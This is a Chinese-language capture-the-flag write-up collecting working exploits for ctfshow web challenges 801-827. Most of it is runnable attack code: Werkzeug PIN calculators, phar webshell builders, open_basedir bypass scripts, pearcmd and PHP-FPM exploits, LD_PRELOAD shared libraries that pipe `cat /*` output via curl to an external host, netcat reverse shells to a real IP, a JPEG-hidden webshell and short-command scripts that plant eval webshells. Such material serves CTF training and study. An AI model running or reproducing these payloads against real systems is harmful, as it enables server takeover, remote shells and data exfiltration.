ctfshow 常用姿势 801-827

web801 flask算pinweb 803phar文件包含web 804 phar反序列化web805 open_basedir绕过利用DirectoryIterator +Glob 直接列举目录绕过open_basedir读文件脚本 P牛806 php 无参RCEget_defined_vars ( void ) : array 返回由所有已定义变量所组成的数组php函数读取文件getheaders (待测)807 反弹shell的各种姿势808 php7.0文件包含崩溃卡临时文件809 pear 文件包含810 SSRF打PHP-FPM811 file_put_contents打PHP-FPM812 PHP-FPM未授权813 劫持mysqli814 通过LD_PRELOAD劫持getuid815 劫持构造器816 利用临时文件写入so817 利用body的缓存机制利用临时文件818 无上传点，写入so819 无上传点 ，借壳生蛋820 jpg的图片图片木马821 7字符可写 命令执行822 7字符(web目录不可写)823 5字符 有dir824 5字符无dir825 4字符 有dir826 4字符 无dir827 4字符环境无dir且不出网

web801 flask算pin

username 通过getpass.getuser()读取，通过文件读取/etc/passwd

modname 通过getattr(mod,“file”,None)读取，默认值为flask.app

appname 通过getattr(app,“name”,type(app).name)读取，默认值为Flask

moddir 当前网络的mac地址的十进制数，通过getattr(mod,“file”,None)读取实际应用中通过报错读取

uuidnode 通过uuid.getnode()读取，通过文件/sys/class/net/eth0/address得到16进制结果，转化为10进制进行计算

machine_id 每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id，docker靶机则读取/proc/self/cgroup，其中第一行的/docker/字符串后面的内容作为机器的id，在docker环境下读取后两个，非docker环境三个都需要读取

根据脚本来 注意区别也就就是3.6与3.8的MD5加密和sha1加密不同

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
​
private_bits = [
    '2485377591743',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '653dc458-4634-42b1-9a7a-b22a082e1fcec412e26928ab40b306fd70a33c054eb80980e70bf48229bb29b3a8393daeba83'#  /proc/self/cgroup
]
​
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
​
cookie_name = '__wzd' + h.hexdigest()[:20]
​
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
​
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
​
print(rv)
​

#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
​
private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]
​
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
​
cookie_name = '__wzd' + h.hexdigest()[:20]
​
num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]
​
rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num
​
print(rv)

web 803phar文件包含

<?php 
$phar = new Phar("shell.phar");
$phar->startBuffering();
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString("a.txt", "<?php eval(\$_POST[1]);?>");
$phar->stopBuffering();
?>
​

import requests  
url="http://8f3853ba-93ce-401e-8736-78978c639681.challenge.ctf.show/"
data1={'file':'/tmp/a.phar','content':open('shell.phar','rb').read()}
data2={'file':'phar:///tmp/a.phar/a','content':'123','1':'system("cat f*");'} 
requests.post(url,data=data1)
r=requests.post(url,data=data2)
print(r.text)
​

web 804 phar反序列化

<?php 
class hacker{
    public $code;
    public function __destruct(){
        eval($this->code);
    }
}
$a=new hacker();
$a->code="system('cat f*');";
$phar = new phar("shell.phar");
$phar->startBuffering();
$phar->setMetadata($a);
$phar -> setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString("a.txt", "<?php eval(\$_POST[1]);?>");
$phar->stopBuffering();
?>
​
​

import requests  
url="http://d84e71aa-604b-4ea3-8ac2-03a23dabcadc.challenge.ctf.show/"
data1={'file':'/tmp/a.phar','content':open('shell.phar','rb').read()}
data2={'file':'phar:///tmp/a.phar','content':'123'}
requests.post(url,data=data1)
r=requests.post(url,data=data2)
print(r.text)
​

web805 open_basedir绕过

Open_basedir是PHP设置中为了防御PHP跨目录进行文件（目录）读写的方法，所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合，在定义了open_basedir以后，php可以读写的文件、目录都将被限制在这些目录中。

表现在只能读取特定目录 ， 蚁剑可以虚拟终端模式进入

但这并不是今天要学习的姿势

利用DirectoryIterator +Glob 直接列举目录

DirectoryIterator 是php5中增加的一个类，为用户提供一个简单的查看目录的接口

glob: 数据流包装器是从 PHP 5.3.0 起开始有效的，用来查找匹配的文件路径

结合这两个方式，我们就可以在php5.3以后对目录进行列举。在实测中，我们得知，此方法在Linux下列举目录居然可以无视open_basedir。

<?php
printf('<b>open_basedir : %s </b><br />', ini_get('open_basedir'));
$file_list = array();
// normal files
$it = new DirectoryIterator("glob:///*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
// special files (starting with a dot(.))
$it = new DirectoryIterator("glob:///.*");
foreach($it as $f) {
    $file_list[] = $f->__toString();
}
sort($file_list);
foreach($file_list as $f){
        echo "{$f}<br/>";
}
?>

绕过open_basedir读文件脚本 P牛

<?php
/*
* by phithon
* From https://www.leavesongs.com
* detail: http://cxsecurity.com/issue/WLB-2009110068
*/
header('content-type: text/plain');
error_reporting(-1);
ini_set('display_errors', TRUE);
printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());
printf("disable_functions: %s\n", ini_get('disable_functions'));
$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');
$relat_file = getRelativePath(__FILE__, $file);
$paths = explode('/', $file);
$name = mt_rand() % 999;
$exp = getRandStr();
mkdir($name);
chdir($name);
for($i = 1 ; $i < count($paths) - 1 ; $i++){
    mkdir($paths[$i]);
    chdir($paths[$i]);
}
mkdir($paths[$i]);
for ($i -= 1; $i > 0; $i--) { 
    chdir('..');
}
$paths = explode('/', $relat_file);
$j = 0;
for ($i = 0; $paths[$i] == '..'; $i++) { 
    mkdir($name);
    chdir($name);
    $j++;
}
for ($i = 0; $i <= $j; $i++) { 
    chdir('..');
}
$tmp = array_fill(0, $j + 1, $name);
symlink(implode('/', $tmp), 'tmplink');
$tmp = array_fill(0, $j, '..');
symlink('tmplink/' . implode('/', $tmp) . $file, $exp);
unlink('tmplink');
mkdir('tmplink');
delfile($name);
$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";
$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";
echo "\n-----------------content---------------\n\n";
echo file_get_contents($exp);
delfile('tmplink');
​
function getRelativePath($from, $to) {
  // some compatibility fixes for Windows paths
  $from = rtrim($from, '\/') . '/';
  $from = str_replace('\\', '/', $from);
  $to   = str_replace('\\', '/', $to);
​
  $from   = explode('/', $from);
  $to     = explode('/', $to);
  $relPath  = $to;
​
  foreach($from as $depth => $dir) {
    // find first non-matching dir
    if($dir === $to[$depth]) {
      // ignore this directory
      array_shift($relPath);
    } else {
      // get number of remaining dirs to $from
      $remaining = count($from) - $depth;
      if($remaining > 1) {
        // add traversals up to first matching dir
        $padLength = (count($relPath) + $remaining - 1) * -1;
        $relPath = array_pad($relPath, $padLength, '..');
        break;
      } else {
        $relPath[0] = './' . $relPath[0];
      }
    }
  }
  return implode('/', $relPath);
}
​
function delfile($deldir){
    if (@is_file($deldir)) {
        @chmod($deldir,0777);
        return @unlink($deldir);
    }else if(@is_dir($deldir)){
        if(($mydir = @opendir($deldir)) == NULL) return false;
        while(false !== ($file = @readdir($mydir)))
        {
            $name = File_Str($deldir.'/'.$file);
            if(($file!='.') && ($file!='..')){delfile($name);}
        } 
        @closedir($mydir);
        @chmod($deldir,0777);
        return @rmdir($deldir) ? true : false;
    }
}
​
function File_Str($string)
{
    return str_replace('//','/',str_replace('\\','/',$string));
}
​
function getRandStr($length = 6) {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $randStr = '';
    for ($i = 0; $i < $length; $i++) {
        $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $randStr;
}

806 php 无参RCE

get_defined_vars ( void ) : array 返回由所有已定义变量所组成的数组

?code=eval(end(current(get_defined_vars())));&b=phpinfo();

php函数读取文件

1.输出当前目录文件名

正常情况下 print_r(scandir('.'));可以用来查看当前目录所有文件名

现在就是获取参数里这个点

方法一：localeconv()

localeconv()返回一包含本地数字及货币格式信息的数组。而数组第一项就是"."

要怎么取到这个点呢，另一个函数：current()返回数组中的单元，默认取第一个值

** ;成功打印出当前目录下文件**：

或者使用print_r(scandir(pos(localeconv())));，pos是current的别名

正常的，我们还可以用print_r(scandir('绝对路径'));来查看当前目录文件名

获取绝对路径可用的有getcwd()

所以我们还可以用print_r(scandir(getcwd()));输出当前文件夹所有文件名

array_reverse()

将整个数组倒过来，有的时候当我们想读的文件比较靠后时，就可以用这个函数把它倒过来，就可以少用几个next()

highlight_file()

打印输出或者返回 filename 文件中语法高亮版本的代码，相当于就是用来读取文件的

getheaders (待测)

807 反弹shell的各种姿势

根据群主给的优雅弹shell网站 https://your-shell.com/

 curl https://your-shell.com/yourip:1337 | sh

808 php7.0文件包含崩溃卡临时文件

使用条件: php 7.0

有完整的包含点，并且参数可控

/tmp目录可写

809 pear 文件包含

姿势1:

?file=/usr/local/lib/php/pearcmd.php&aaaa+install+-R+/var/www/html/+http://82.156.168.16/shell.php

包含 ?file=/var/www/html/tmp/pear/download/shell.php

姿势2：

?file=/usr/local/lib/php/pearcmd.php&+-c/tmp/e.php+-d+man_dir=<?eval($_POST[1]);?>+-s
用burp放  如果用hackbar放会把<>url编码

包含 ?file=/tmp/e.php 

姿势3:

?file=/usr/local/lib/php/pearcmd.php&aaaa+config-create+/var/www/html/<?=`$_POST[1]`?>+1.php

810 SSRF打PHP-FPM

工具下载地址https://github.com/tarunkant/Gopherus 打fastcgi用法： python2 gopherus.py --exploit fastcgi

最后将生成的payload下划线后面的url编码，也即gopher://127.0.0.1:9000/_后面的全部url编码。

811 file_put_contents打PHP-FPM

812 PHP-FPM未授权

p牛 yyds Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 | 离别歌

直接运行脚本ftp.py -p端口改成自己的

python fpm.py  -c "<?php system('ls /');?>" -p 28138  pwn.challenge.ctf.show /usr/local/lib/php/System.php

813 劫持mysqli

大致过程就是 本地生成一个恶意mysqli.so(mysqli的扩展),如何扩展里面有ctfshow这个函数。题目调用ctfshow函数的时候就会去扩展里面找(php函数中没有)

可以采用php源码中的ext_skel.php来生成。

条件

1. 扩展目录明确且可写

2. 能够载入我们的恶意so文件(重启php-fpm或者能使用php命令)

3. 有调用我们自定义函数的代码

   shell_exec("php -r 'ctfshow();'");

利用步骤

1.php ext_skel.php --ext ctfshow --std 运行成功后会在当前目录下生成扩展名目录

2.进入到目录下，找到.c文件并编辑 修改有三处

 

 

文件头包含stdlib.h 才能用system命令

还要注意一点 版本问题 修改ZEND_MODULE_APT_NO 为环境版本

 

3.依次执行如下命令

phpize
./configure
make && make install

生成后告知具体位置

 

4.

import requests
url="http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/"
data={'file':'/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so','content':open('ctfshow.so','rb').read()}
requests.post(url+'?a=write',data=data)
requests.get(url+'?a=run')

814 通过LD_PRELOAD劫持getuid

条件：

1.有写入点

2.可执行putenv命令

3.执行了可以生成新进程的函数

php中哪些函数能产生新进程呢

• 命令执行类 :system,exec,shell_exec,passthru

• 进程类：proc_open,popen

• 外部程序调用类 mail imap_mail

• 扩展缺陷类

  imagick，初始化wmv等11种后缀时,调用外部ffmpeg程序

  <?php
      $img= new Imagick('ctfshow.wmv');
  ?>

步骤

1. a.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload(){
        system("curl http://url:port?s=`cat /*`");
}
int getuid()
{
        if(getenv("LD_PRELOAD")==NULL){ return 0;}
        unsetenv("LD_PRELOAD");
        payload();
}

2.生成恶意so文件

gcc -c -fPIC a.c -o hack&&gcc --share hack -o hack.so

3.

import requests
url="http://d0fd536a-f3d9-4563-bcb0-568f4f22ad7e.challenge.ctf.show/"
data={'file':'/tmp/hack.so','content':open('hack.so','rb').read()}
requests.post(url+'?a=write',data=data)
requests.get(url+'?a=run&env=LD_PRELOAD=/tmp/hack.so')

815 劫持构造器

和上题一样，不同的这题劫持了构造器 可以通杀

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
extern char** environ;

__attribute__ ((__constructor__)) void hack(void)
{
unsetenv("LD_PRELOAD");
system("curl http://xxx:4567?s=`cat /*`");
}

816 利用临时文件写入so

生成so文件的方法同上。只不过不能直接上传文件了，但是可以强制上传生成临时文件。 vps开启监听即可。

import requests
url="http://54cc95b6-c864-42ca-8ea4-8ece65dbcb77.challenge.ctf.show/?env=LD_PRELOAD=/tmp/"
files={'file':open('hack.so','rb').read()}
response=requests.post(url,files=files)
response=requests.post(url,files=files)

817 利用body的缓存机制利用临时文件

$file = $_GET['file'];
if(isset($file) && preg_match("/^\/(\w+\/?)+$/", $file)){
    shell_exec(shell_exec("cat $file"));
​
}

如果post传一段很大的数据，首先生成临时文件，然后请求结束后被删除。不过该文件其实还会存在于/proc/pid/fd/xxx下，而后面的xxx范围很小，可以爆破出来的。pid们上面已经可以得到了。

exp

import  threading, requests
import socket
import re
port= 28053
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',port))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1
​
    '''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)
​
con="curl http://82.156.168.16:4567?`cat /f*`;"+'0'*1024*500
l = len(con)
def upload():
    while True:
        s=socket.socket()
        s.connect(('pwn.challenge.ctf.show',port))
        x=f'''POST / HTTP/1.1
Host: 127.0.0.1
Content-Length: {l}
Content-Type: application/x-www-form-urlencoded
Connection: close
​
{con}
​
        '''.encode()
        s.send(x)
        s.close()
​
def bruter():
    while True:
        for fd in range(3,40):
            print(fd)
            s=socket.socket()
            s.connect(('pwn.challenge.ctf.show',port))
            s.send(f'''GET /?file=/proc/{pid}/fd/{fd} HTTP/1.1
Host: 127.0.0.1
Connection: close
​
'''.encode())
            print(s.recv(2048).decode())
            s.close()
​
​
for i in range(30):
    t = threading.Thread(target=upload)
    t.start()
for j in range(30):
    a = threading.Thread(target=bruter)
    a.start()
​

818 无上传点，写入so

exp

# coding: utf-8

import urllib.parse
import  threading, requests
import socket
import re
port= 28133
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',port))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
print(pid)
l=str(len(open('hack.so','rb').read()+b'\n'*1024*200)).encode()
def upload():
	while True:
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',port))	
		x=b'''POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: yu22x
Content-Length: '''+l+b'''
Content-Type: application/x-www-form-urlencoded
Connection: close

'''+open('hack.so','rb').read()+b'\n'*1024*200+b'''

'''
		s.send(x)
		s.close()

def bruter():
	while True:
		for fd in range(3,40):
			print(fd)
			s=socket.socket()
			s.connect(('pwn.challenge.ctf.show',port))
			s.send(f'''GET /?env=LD_PRELOAD=/proc/{pid}/fd/{fd} HTTP/1.1
Host: 127.0.0.1
User-Agent: yu22x
Connection: close

'''.encode())
			print(s.recv(2048).decode())
			s.close()


for i in range(30):
    t = threading.Thread(target=upload)
    t.start()
for j in range(30):
    a = threading.Thread(target=bruter)
    a.start()

819 无上传点 ，借壳生蛋

?env=BASH_FUNC_whoami%%=() { ls; }

whoami是system("whoami")启动的bash环境的函数，相当于我们注册了一个whoami替换它

总结 能控制环境变量，却无上传点，可以

1. 利用php的$_FILE机制，使用临时文件注入恶意so (需要知道临时文件的名putenv($env.scandir("/tmp")[2]);)

2. 利用nginx的body缓存 /proc/pid/fd

   $env = $_GET['env'];
   if(isset($env)){
   	putenv($env);
   	system("echo ctfshow");
   }else{
   	system("ps aux");
   }

3. 利用nginx的fastcgi缓存 暂不知道

4. 利用bash的匿名函数环境变量 限制(Ubuntu sh指向dsh)

?env=BASH_FUNC_whoami%%=() { ls; }

820 jpg的图片图片木马

题目严格限制了图片类型，不仅需要通过getimagesize,还要比对mine信息，最后还要进行base64解码

这就要求我们构造一个可以正常使用的图片，且包含一句话木马，并且不能破环图片的结构

群主大大精心构造的jpg木马

PD89YCRfR0VUWzFdYDs7Pz4C 解码<?=$_GET[1];;?>

利用了jpeg图片中不可更改的俩个C

 

FF D8 FF E0 00 10 50 44 38 39 59 01 01 01 00 60
00 60 00 00 FF DB 00 43 00 08 06 06 07 06 05 08
07 07 07 09 09 08 0A 0C 14 0D 0C 0B 0B 0C 19 12
13 0F 14 1D 1A 1F 1E 1D 1A 1C 1C 20 24 2E 27 20
22 1F 1F 1F 1F 1F 1F 52 66 52 30 56 55 57 7A 46
64 59 44 73 37 50 7A 34 1F FF DB 00 43 01 09 09
09 0C 0B 0C 18 0D 0D 18 1F 1F 1F 1F 1F 1F 1F 1F
1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F
1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F 1F
F2 F2 F2 F2 F2 F2 F2 F2 F2 F2 F2 F2 F2 F2 FF C2
00 11 08 00 02 00 02 03 01 22 00 02 11 01 03 11
01 FF C4 00 15 00 01 01 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 06 FF C4 00 14 01 01 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF DA
00 0C 03 01 00 02 10 03 10 00 00 01 BF 07 FF C4
00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 FF DA 00 08 01 01 00 01 05 02 7F FF
C4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 FF DA 00 08 01 03 01 01 3F 01 7F
FF C4 00 14 11 01 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 FF DA 00 08 01 02 01 01 3F 01
7F FF C4 00 14 10 01 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 FF DA 00 08 01 01 00 06 3F
02 7F FF C4 00 14 10 01 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 FF DA 00 08 01 01 00 01
3F 21 7F FF DA 00 0C 03 01 00 02 00 03 00 00 00
10 F3 FF C4 00 14 11 01 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 FF DA 00 08 01 03 01 01
3F 10 7F FF C4 00 14 11 01 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 FF DA 00 08 01 02 01
01 3F 10 7F FF C4 00 14 10 01 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 FF DA 00 08 01 01
00 01 3F 10 7F FF D9
​

821 7字符可写 命令执行

<?php eval($_GET[1]);
​
PD9waHAgZXZhbCgkX0dFVFsxXSk7
#需要执行的语句
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

exp ls -t>0

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://601d778c-dd03-439a-a11d-383a45d00918.challenge.ctf.show/"
​
payload=[
">hp",
">1.p\\",
">d\\>\\",
">\\ -\\",
">e64\\",
">bas\\",
">7\\|\\",
">XSk\\",
">Fsx\\",
">dFV\\",
">kX0\\",
">bCg\\",
">XZh\\",
">AgZ\\",
">waH\\",
">PD9\\",
">o\\ \\",
">ech\\",
"ls -t>0",
". 0"
]
​
def writeFile(payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create "+p.strip())
        time.sleep(1)
​
def check():
    response = requests.get(url+"1.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is "+url+"1.php")
​
def main():
    run()
    check()
​
if __name__ == '__main__':
    main()

经典的GET型shell转POST型shell连接蚁剑

 

822 7字符(web目录不可写)

上传临时文件 然后执行 . /t*/*

exp

POST / HTTP/1.1
Host: 336de92b-c271-4bf9-b96b-413ee3efd3ac.challenge.ctf.show
Content-Length: 316
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://336de92b-c271-4bf9-b96b-413ee3efd3ac.challenge.ctf.show
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPdQJ6daBObDjRlxQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://336de92b-c271-4bf9-b96b-413ee3efd3ac.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9
Cookie: UM_distinctid=1804bd4a24ff50-0eda051cf09aa2-6b3e555b-144000-1804bd4a2507a7
Connection: close

------WebKitFormBoundaryPdQJ6daBObDjRlxQ
Content-Disposition: form-data; name="file"; filename="f.jpg"
Content-Type: image/jpeg

#!bin/sh
nc 82.156.168.16 1337 -e /bin/sh
------WebKitFormBoundaryPdQJ6daBObDjRlxQ
Content-Disposition: form-data; name="cmd"

. /t*/*
------WebKitFormBoundaryPdQJ6daBObDjRlxQ--

群主大大全自动脚本exp

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://178ba1e2-f5c6-4563-a31c-2b41563a1196.challenge.ctf.show/"
​
​
def getShell(payload):
    data={
    "cmd":payload
    }
    file = {
    "file":b"#!/bin/sh\nnc 82.156.168.16 3389 -e /bin/sh"
    }
    requests.post(url,data=data,files=file)
​
def run():
    getShell(". /t*/*")
​
def main():
    run()
    
if __name__ == '__main__':
    main()

823 5字符 有dir

* /t*

php z

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://c68adc0f-69fc-4a9a-b8a6-97866ad40445.challenge.ctf.show/"
url_2 = url+".php"
delay = 0.3
​
chagneFile_payload=[
'>cp',
'>k',
'*',
'rm cp',
'>pc',
'>dir',
'*>v',
'>rev',
'*v>z',
'sh z',
'rm v',
'rm k',
'rm z',
'rm pc',
'rm *v',
'>php.',
'>j\\#',
'>vm',
'*>v',
'>rev',
'*v>z',
'sh z'
]
​
clearFile_payload=[
'rm d*',
'rm j*',
'rm p*',
'rm r*',
'rm v*',
'rm z'
]
​
shell_payload=[
'>tar',
'>vcf',
'>z'
]
​
file={
    'file':b'<?php file_put_contents("1.php","<?php eval(\$_POST[1]);?>");?>'
}
​
​
def changeFile():
    for p in chagneFile_payload:
        sendPayload(url,p)
        print("[*] create "+p.strip())
        time.sleep(delay)
​
def clearFile():
    for p in clearFile_payload:
        sendPayload(url_2,p)
        print("[*] create "+p.strip())
        time.sleep(delay)
​
def getshell():
    for p in shell_payload:
        sendPayload(url_2,p)
        print("[*] create "+p.strip())
        time.sleep(delay)
    data={
        "cmd":"* /t*"
    }
    requests.post(url_2,data=data,files=file)
    data={
        "cmd":"php z"
    }
    requests.post(url_2,data=data)
​
def checkShell():
    response = requests.get(url+"1.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is "+url+"1.php")
​
def sendPayload(url,payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
​
​
def run():
    changeFile()
    clearFile()
    getshell()
    checkShell()
​
def main():
    run()
​
if __name__ == '__main__':
    main()

824 5字符无dir

dir和ls的区别

 

思路 干不掉题 干掉出题的人

grep h index.php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:28
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://39fede4b-390d-42a1-b6c4-0924a2556b4e.challenge.ctf.show/"
​
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
​
def writeFile(payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create "+p.strip())
        time.sleep(0.3)
    print("[*] Attack success!!!Webshell is "+url)
​
def main():
    run()
​
if __name__ == '__main__':
    main()

825 4字符 有dir

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://e371bc8c-bbcb-4f29-8d75-d2e86fcc3913.challenge.ctf.show/"
​
payload = [
'>sl',
'>kt-',
'>j\\>',
'>j\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
'sh x',
'sh j'
]
​
def writeFile(payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create "+p.strip())
        time.sleep(0.3)
​
def check():
    response = requests.get(url+"a.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is "+url+"a.php")
​
def main():
    run()
    check()
​
if __name__ == '__main__':
    main()

826 4字符 无dir

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://5d259552-723c-4eef-99c5-db7cea3aad4c.challenge.ctf.show/"
​
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
​
#curl 2030350346|sh ip的十进制  目的获得 echo "<?php eval($_POST[1]);?>" >1.php
'>sh',
'>\\|\\',
'>52\\',
'>83\\',
'>99\\',
'>85\\',
'>13\\',
'>\\ \\',
'>rl\\',
'>cu\\',
​
'sh z',
'sh a',
]
def writeFile(payload):
    data={
    "cmd":payload
    }
    requests.post(url,data=data)
​
def run():
    for p in payload:
        writeFile(p.strip())
        print("[*] create "+p.strip())
        time.sleep(1)
​
def check():
    response = requests.get(url+"1.php")
    if response.status_code == requests.codes.ok:
        print("[*] Attack success!!!Webshell is "+url+"1.php")
​
def main():
    run()
    check()
​
if __name__ == '__main__':
    main()

827 4字符环境无dir且不出网

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-05-06 13:25:41
# @Last Modified by:   h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
​
​
import requests
import time
​
url = "http://259d0a1f-62d8-4c9c-b3ba-aa24e20056c5.challenge.ctf.show/"
​
payload = [
'>\\ \\',
'>-t\\',
'>\\>a',
'>ls\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
​
'>php',
'>a.\\',
'>\\>\\',
'>-d\\',
'>\\ \\',
'>64\\',
'>se\\',
'>ba\\',
'>\\|\\',
'>4=\\',
'>Pz\\',
'>k7\\',
'>XS\\',
'>sx\\',
'>VF\\',
'>dF\\',
'>X0\\',
'>gk\\',
'>bC\\',
'>Zh\\',
'>ZX\\',
'>Ag\\',
'>aH\\',
'>9w\\',
'>PD\\',
'>S}\\',
'>IF\\',
'>{\\',
'>\\$\\',
'>ho\\',
'>ec\\',
​
​
'sh z',
'sh a'
]
